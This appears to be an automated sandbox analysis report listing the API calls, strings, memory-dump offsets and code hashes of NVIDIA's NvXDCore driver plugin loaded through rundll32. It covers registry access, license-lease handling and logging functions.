                                                                    • String ID: Advapi32.dll$CloseServiceHandle$OpenSCManagerW$OpenServiceW$QueryServiceConfigW
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: DeleteValue$lstrcat
                                                                    • String ID: DeleteNLSNodeUrlRegistryValues$Failed to clear the registry value for alternate server URL$Failed to clear the registry value for server URL$NLSServerURL$NLSStandbyServerURL$NvXDCore.cpp$SOFTWARE\NVIDIA Corporation\Global\GridSW$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridSW
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ClassObject$CloseCreateEventHandle$ObjectsRegisterResumeRevokeSingleThreadWait
                                                                    • String ID: NvXDCore.cpp
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorLast$CloseCreateHandleInit_thread_footerInstanceMultipleObjectsWait
                                                                    • String ID: SyncHandles Are$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::HandleCplShutdown$wait for sync mutext failed$waiting for SyncHandles count$waiting for SyncHandles finished with the result
                                                                    • API String ID: 3807003664-2047345439
                                                                    • Opcode ID: 0b9c20ea03ebd9dbad61d74de9f5408c606bbc6890b3fb68dbf3ab403222f65e
                                                                    • Instruction ID: ff39268ee0b68782575a9fa618c035e9e7d827b712ce2fc9be162e87283bd5bf
                                                                    • Opcode Fuzzy Hash: 0b9c20ea03ebd9dbad61d74de9f5408c606bbc6890b3fb68dbf3ab403222f65e
                                                                    • Instruction Fuzzy Hash: 70F10C36B0AB42A9EB10DBA1D4401ED33B5FB44798F400536DE5D17B59EF38D129C398
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Value$DeleteQuery$CloseOpen
                                                                    • String ID: DriverError\ErrorCode$DriverError\ErrorContext
                                                                    • API String ID: 3061106577-343931756
                                                                    • Opcode ID: e8b55f2feab4bbdb2e5f427509d0c0b4b64532db7f2b9eb8bdf90c0d6540112f
                                                                    • Instruction ID: 629bd2de4dadde0a2bc66a20d671661ba9584af99fd6fb8001dc12e0ffded5f2
                                                                    • Opcode Fuzzy Hash: e8b55f2feab4bbdb2e5f427509d0c0b4b64532db7f2b9eb8bdf90c0d6540112f
                                                                    • Instruction Fuzzy Hash: 2951A23261AB4292EB50DF10E8407BA77A4FB88BD4F405036EE8E43A54EF3CD954CB24
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressErrorLastLocalProc$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: SYSTEM\CurrentControlSet\Control\Class\$SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                    • API String ID: 2783935822-1735570339
                                                                    • Opcode ID: ea7982ab65b0be596e67a36e9fb1c312a3c390b9a24ba4bca06979929f529bb5
                                                                    • Instruction ID: f89cca99eb4c622f84f78d0b49fea2cd34bfb7c054131ff5870f798eecc1dc35
                                                                    • Opcode Fuzzy Hash: ea7982ab65b0be596e67a36e9fb1c312a3c390b9a24ba4bca06979929f529bb5
                                                                    • Instruction Fuzzy Hash: B7513931A0AB12E6FB50CB21E8506A923A0FF487C4F444039DD4E57B59EF7CE965C728
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                    • API String ID: 1099746521-1866435925
                                                                    • Opcode ID: 7a8d0049a9d0e06720ebc07020fd1cc616381782ec0e2f7e48c170f5f1d1b8dd
                                                                    • Instruction ID: 54b5bbe34b023c4d07fe19fb6caef816c5524351d30a6ef636faecd34fbb53f1
                                                                    • Opcode Fuzzy Hash: 7a8d0049a9d0e06720ebc07020fd1cc616381782ec0e2f7e48c170f5f1d1b8dd
                                                                    • Instruction Fuzzy Hash: 0D11D661E2A647B1EE04E710C8412F923A0EF507C4F90543AE6EE07996DF7DE90EC768
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Close$Deallocatestd::_$Open
                                                                    • String ID: LogFilters$LogManagers\$LogPrinters
                                                                    • API String ID: 1882939507-3386155771
                                                                    • Opcode ID: 4de4560469443e222230ed4f737482b2e7f9c7366df2abc6aed90be0a103b973
                                                                    • Instruction ID: 337ce092dc022f9d8a5840fed9fde9bbb6042e7190925015bd62488b681003d3
                                                                    • Opcode Fuzzy Hash: 4de4560469443e222230ed4f737482b2e7f9c7366df2abc6aed90be0a103b973
                                                                    • Instruction Fuzzy Hash: E7C1823260ABC6A1EB60DB21E4407AEA370FB85BD4F445135DAAE43B95DF3CD948C718
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CreateEventFromGuidsInit_thread_footerInstanceStringTraceUnregister
                                                                    • String ID: APPID$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnUnInitialize$Received OnUnInitialize() from NvContainer$Unregistering AppId for NvXDCoreModule$Unregistering server for NvXDCoreModule${C5EDFC9D-B018-41A4-9877-39AB18469C3A}
                                                                    • API String ID: 2576725573-2006552945
                                                                    • Opcode ID: 7f87d3fff44f14fdff29451ae0676118c8797f00f55233acd2d0c76cc97a0955
                                                                    • Instruction ID: af252be2034d0de301baf50a3656fadffdc597134d510fc4a94bea11f20db66c
                                                                    • Opcode Fuzzy Hash: 7f87d3fff44f14fdff29451ae0676118c8797f00f55233acd2d0c76cc97a0955
                                                                    • Instruction Fuzzy Hash: 64C12B32A06B82E9EB119F61E8401ED33A4FB447D8F800139EA9D57B69EF3CD559C358
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo$FileSizeswprintf
                                                                    • String ID: Failed to allocate memory$Failed to get file handle %s (%s)$Failed to open file %s (%s)$File size is greater than the maximum allowed limit$GridCommonUtils.cpp$Invalid output buffer to read the file$readDataFromFile
                                                                    • API String ID: 1804721631-2846590039
                                                                    • Opcode ID: 787ba92b32396975d36dd7a8a3d990c1eac88cc14c00e52c62fd1c738779817d
                                                                    • Instruction ID: c37ca4f5405dc9313b9e5b24934696dcb553f2360f67198e920140c11b52524d
                                                                    • Opcode Fuzzy Hash: 787ba92b32396975d36dd7a8a3d990c1eac88cc14c00e52c62fd1c738779817d
                                                                    • Instruction Fuzzy Hash: 2F719121A0BB82A5FB109B61E4003EA67A0FF847D8F500635DA6D17796EF3CE419C758
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$RegCloseKey$RegEnumValueW$RegOpenKeyExW
                                                                    • API String ID: 576420853-1884500446
                                                                    • Opcode ID: f73ff4851a463b3f7fdb30ce46c8df8383579259be15c863f66517dffea24ec0
                                                                    • Instruction ID: 0db856ba6606d7fa26a4907be38cf2360b6f5faceab299f8f78175f92eacbe69
                                                                    • Opcode Fuzzy Hash: f73ff4851a463b3f7fdb30ce46c8df8383579259be15c863f66517dffea24ec0
                                                                    • Instruction Fuzzy Hash: 50515B31A0BB02A2FB918B16A85037966A1FF58BD4F444138DE4D077A4EF7CF825C638
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Task$CriticalSection$AllocEnterFreeLeaveRealloclstrcmpi
                                                                    • String ID: }}$HKCR$HKCU{Software{Classes
                                                                    • API String ID: 581389959-1142484189
                                                                    • Opcode ID: ed0ea84bc2394703962b9794f8839fa00afcfd3d746f69359d03b77b6050c4e0
                                                                    • Instruction ID: 0d7dcafeb20bdc0c9ee61b52644c8b4009208f648db788e370b97477d6ec8df4
                                                                    • Opcode Fuzzy Hash: ed0ea84bc2394703962b9794f8839fa00afcfd3d746f69359d03b77b6050c4e0
                                                                    • Instruction Fuzzy Hash: B5C1A922B1BB42A5FBA09B6194006BC23A1EF49BD4F044135CE5E577E4DFB8AC60C728
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                    Similarity
                                                                    • API ID: CriticalSection$Module$EnterErrorFileHandleInitializeLastLeaveName_invalid_parameter_noinfo
                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Event$Init_thread_footerObjectSingleWait
                                                                    • String ID: NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnStop$Received Service Stop request from NvContainer$Releasing lease
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD1F1
                                                                    • GetProcAddress.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD220
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    • SetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD2BB
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD316
                                                                    • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,?,00007FF8A8CFB4A1), ref: 00007FF8A8CFD352
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressFreeLocalProc$ConditionErrorInfoLastMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$RegCloseKey$RegOpenKeyExW
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc$Delete
                                                                    • String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressProc$ConditionErrorInfoLastMaskVerifyVersion
                                                                    • String ID: Advapi32.dll$CurrentBuildNumber$RegCloseKey$RegOpenKeyExW$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ActiveConsoleEnumerateFreeMemorySessionSessions
                                                                    • String ID: CreateChildProcesses$NvXDCore.cpp$child processes Session id is$launching sync from child processes
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: EventInit_thread_footerNotificationRegisterSession
                                                                    • String ID: $Failed to register for events. Aborting....$NvXDCore.cpp$Nvidia::UXDriver::Core::NvXDCorePlugin::OnStart$Received OnStart() from NvContainer
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF8A8CFCFA8
                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00007FF8A8CFCFD4
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    • LocalAlloc.KERNEL32 ref: 00007FF8A8CFD095
                                                                    • LocalFree.KERNEL32 ref: 00007FF8A8CFD133
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCD50
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCD80
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCDAC
                                                                      • Part of subcall function 00007FF8A8CFCCF0: GetProcAddress.KERNEL32 ref: 00007FF8A8CFCDD8
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: GetcvtMbrtowc
                                                                    • String ID: ,$false$true
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$__std_exception_copy
                                                                    • String ID: returned $RegistryException:
                                                                    • API String ID: 3384336446-434066331
                                                                    • Opcode ID: 00755f9cf649a541bb6ffdbe0a6f89ec2a048edb149ce880b7e54dc54dc62ce7
                                                                    • Instruction ID: 115bbf5bf24f53f2977637211e415c9119632a10edda4f059ad5fb8bb25e2927
                                                                    • Opcode Fuzzy Hash: 00755f9cf649a541bb6ffdbe0a6f89ec2a048edb149ce880b7e54dc54dc62ce7
                                                                    • Instruction Fuzzy Hash: 4A41AB72B0AA41A9FB04CFA5E8401EC3336EB447D8F404036CA5E63BAADF38D559C358
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D0EA24: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0EA6E
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D096A4
                                                                      • Part of subcall function 00007FF8A8D00A80: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00AB2
                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D096B4
                                                                      • Part of subcall function 00007FF8A8DC1390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC140D
                                                                      • Part of subcall function 00007FF8A8DC1390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC144C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$DeallocateFileHeaderRaiseThrow__std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                    • String ID: ClassName$DebugOutputLogManager$FileLogManager$No LogManager defined with such name$StreamManager
                                                                    • API String ID: 2903377776-1756275191
                                                                    • Opcode ID: c4426073df8bf17878242d3d365278b24583b98ba0d4c22a861248d6dc48f0be
                                                                    • Instruction ID: 15dee3f6fc32f60beb63091e8f36144e925e44ff472de8af4a48ee76ab4ecfbe
                                                                    • Opcode Fuzzy Hash: c4426073df8bf17878242d3d365278b24583b98ba0d4c22a861248d6dc48f0be
                                                                    • Instruction Fuzzy Hash: 72414C32A0AA02F8EB10EB61D8512F83365EF447D8F815131DA2D476A5EF3DE568C368
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$DeleteDirectoryFileInit_thread_footerRemove
                                                                    • String ID: boost::filesystem::remove
                                                                    • API String ID: 755209694-3435932043
                                                                    • Opcode ID: b64bcb777294a3ce97eee687f9109f358c09142d434cbb4407fc3cf7f26453ea
                                                                    • Instruction ID: 2721991c0055cc7e54ffcaa0dc22feb4712fd2a1ba28f029afaa7fbd2b5cc719
                                                                    • Opcode Fuzzy Hash: b64bcb777294a3ce97eee687f9109f358c09142d434cbb4407fc3cf7f26453ea
                                                                    • Instruction Fuzzy Hash: 01318361A1A182A9FF640B69944C2B92391FF15BD4F640032C92CC3691EF3CFA9C827C
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Ios_base_dtorstd::invalid_argument::invalid_argumentstd::ios_base::_
                                                                    • String ID: Nvidia::Logging::Logger::Logger$c:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\logging\logging.lib\Logger.h$could not convert calendar time to local time$system
                                                                    • API String ID: 3568783628-2048051025
                                                                    • Opcode ID: 5b125194a3b6fbd640f5732ddd7af8216da403e2aec9da76d1aaa13bfb246306
                                                                    • Instruction ID: 47434af915c0dd2153128e5c3a8dd823063a2c9e07402a74122ee4bed1edc6ed
                                                                    • Opcode Fuzzy Hash: 5b125194a3b6fbd640f5732ddd7af8216da403e2aec9da76d1aaa13bfb246306
                                                                    • Instruction Fuzzy Hash: B6917A32A1AB82A5EB10DF21E8401ED33B4FB847D8F800136EA5D17B99EF39D559C364
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteValue$EnumerateFreeInit_thread_footerMemorySessionslstrcat
                                                                    • String ID: License to be returned on session logoff: $NvXDCore.cpp$Releasing lease during session logff : $ReturnLicenseOnSessionLogoff
                                                                    • API String ID: 3566551686-1588682423
                                                                    • Opcode ID: 89394ad219414ea1eda7d1833e9640e5cda7d38ad91ebd8383589c79d5e3b979
                                                                    • Instruction ID: 27add6e55bfd1afeb04c61fe14bd152a4529573872c0065a13a9fc9091224784
                                                                    • Opcode Fuzzy Hash: 89394ad219414ea1eda7d1833e9640e5cda7d38ad91ebd8383589c79d5e3b979
                                                                    • Instruction Fuzzy Hash: 31910932B06B42AAE711DF61E4401EC33B5FB44788F405536DA5D27B69EF38E129C358
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: DeviceErrorLastSetup$InstancePropertyRegistry
                                                                    • String ID: NDERP_DEVID$NDERP_GPU_NAME
                                                                    • API String ID: 4016996502-1684991087
                                                                    • Opcode ID: 5c12baaee5edd9489b6348ea5daa4417e27e7cca9e10c216e82b9e699b45b1b1
                                                                    • Instruction ID: 05d521a357c40c82430e1893a229779b5557b933d9abbbe8af13166535269781
                                                                    • Opcode Fuzzy Hash: 5c12baaee5edd9489b6348ea5daa4417e27e7cca9e10c216e82b9e699b45b1b1
                                                                    • Instruction Fuzzy Hash: 8A41B461A1EA81A1EB10EB66E8442FA6365FF85BD0F844032DF9D43B55DF3CE50AC718
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Local$AddressAllocConditionErrorFreeInfoLastMaskProcVerifyVersion
                                                                    • String ID: Advapi32.dll$RegQueryValueExW
                                                                    • API String ID: 3707099831-295176829
                                                                    • Opcode ID: 3b1918feed5cdcf811039015ee0c203f6dbd9f2afb8276c003aca7cd37809b0a
                                                                    • Instruction ID: 7c0927bf4d93a346a51f7b7f64b7e80a4d55bd7d5a49a95c7cebaeec2e6f5237
                                                                    • Opcode Fuzzy Hash: 3b1918feed5cdcf811039015ee0c203f6dbd9f2afb8276c003aca7cd37809b0a
                                                                    • Instruction Fuzzy Hash: 0B415271B1AB12A2FB948B11A85067972A0FB58BC4F484035EA4D47754EF7CE9218B68
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D0EA24: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0EA6E
                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FF8A8D09538
                                                                      • Part of subcall function 00007FF8A8D00A80: __std_exception_copy.LIBVCRUNTIME ref: 00007FF8A8D00AB2
                                                                    • _CxxThrowException.LIBVCRUNTIME ref: 00007FF8A8D09548
                                                                      • Part of subcall function 00007FF8A8DC1390: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC140D
                                                                      • Part of subcall function 00007FF8A8DC1390: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF8A8D9B7E3), ref: 00007FF8A8DC144C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Exception$DeallocateFileHeaderRaiseThrow__std_exception_copystd::_std::invalid_argument::invalid_argument
                                                                    • String ID: ClassName$No LogPrinter defined with such nume.$SimpleTextLogPrinter$XMLLogPrinter
                                                                    • API String ID: 2903377776-3681829448
                                                                    • Opcode ID: 3047caec9a1ebb199cdd8f96b7ca8cb83d8ba6ed920aecadf12f31988e93eda1
                                                                    • Instruction ID: 7083d4e1eaa17e2706898aa2073aa5bd09e2862bc6dfe49bb2483c2d15918116
                                                                    • Opcode Fuzzy Hash: 3047caec9a1ebb199cdd8f96b7ca8cb83d8ba6ed920aecadf12f31988e93eda1
                                                                    • Instruction Fuzzy Hash: E6317E32A0BA42B8EB10EF61D8912EC2371EF447D8F811531DA2E57696EF3DE518C358
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                    • API String ID: 823179699-3913318428
                                                                    • Opcode ID: c8e40227ea93570c894c3257a732f5e36d0e2c3d26c8cd2adc3fe59e8dea6017
                                                                    • Instruction ID: 8d6763f5adc0931329c39658ac2746c21f2a1c7ec62f102192fe6f79adf389e2
                                                                    • Opcode Fuzzy Hash: c8e40227ea93570c894c3257a732f5e36d0e2c3d26c8cd2adc3fe59e8dea6017
                                                                    • Instruction Fuzzy Hash: CE318132A0AB4296FB51DF56E81032967A0FB84BC4F084135DE8D0BB54DF7CE951CB18
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: ByteCharCompareMultiStringWide__crt$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 3104693799-0
                                                                    • Opcode ID: e554589ce4c0a784027f7e8b14f4731f03de580504056812860894e7a5514fc0
                                                                    • Instruction ID: 2e8d91caec43f8ebf53b4f794e49f1e87092b425819c61201dafa92dbc4564a6
                                                                    • Opcode Fuzzy Hash: e554589ce4c0a784027f7e8b14f4731f03de580504056812860894e7a5514fc0
                                                                    • Instruction Fuzzy Hash: 0581A432B0A7429BEF248F25D444A7962A1FF44BE8F144636EA2D47BC5DF3CE5098724
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
                                                                    • String ID:
                                                                    • API String ID: 469901203-0
                                                                    • Opcode ID: d83811cde9e9b156d4a607af37dc42f73d06dcad2c02b179441610010b2369ea
                                                                    • Instruction ID: 74d890327b0131c74142a519ae56f610831430cb97dc7b5bf6e7586b1e7be40f
                                                                    • Opcode Fuzzy Hash: d83811cde9e9b156d4a607af37dc42f73d06dcad2c02b179441610010b2369ea
                                                                    • Instruction Fuzzy Hash: CC51C232A0AB8155E7249B25B80036AA6A1FB457F0F240B34D7BD43BE5CF3CE4958319
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: dkT$dkT
                                                                    • API String ID: 1323251999-980905629
                                                                    • Opcode ID: 8df98094edd58df8c846224314a2a9f5266a0c90ba580280117205ba055be1a9
                                                                    • Instruction ID: e958898a2fc3c004f24d64b2b70a85dcf148bda1296ade6be5e46dd8238e74bd
                                                                    • Opcode Fuzzy Hash: 8df98094edd58df8c846224314a2a9f5266a0c90ba580280117205ba055be1a9
                                                                    • Instruction Fuzzy Hash: 3CA1DE32B16B4995EB04CF62E4402AC37A5FB48BE8F118636EE6D23B94DF38D419C314
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_
                                                                    • String ID: dkT$dkT
                                                                    • API String ID: 1323251999-980905629
                                                                    • Opcode ID: d27c97df42f0919bb7aabc8d5ab22ae6d130fd941372a0e1de78d82f0e819688
                                                                    • Instruction ID: 63a42f42aa476de44dcade453e4853257fc240940ac71eaf679ab03ae9598113
                                                                    • Opcode Fuzzy Hash: d27c97df42f0919bb7aabc8d5ab22ae6d130fd941372a0e1de78d82f0e819688
                                                                    • Instruction Fuzzy Hash: 0A910D32B16B98A5EB04DF66E4402AC3365FB44BE8F418636EE6D53B98CF38D419C314
                                                                    APIs
                                                                    • _get_daylight.LIBCMT ref: 00007FF8A8DE4C4B
                                                                      • Part of subcall function 00007FF8A8DE4504: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DE4518
                                                                    • _get_daylight.LIBCMT ref: 00007FF8A8DE4C5C
                                                                      • Part of subcall function 00007FF8A8DE44A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DE44B8
                                                                    • _get_daylight.LIBCMT ref: 00007FF8A8DE4C6D
                                                                      • Part of subcall function 00007FF8A8DE44D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF8A8DE44E8
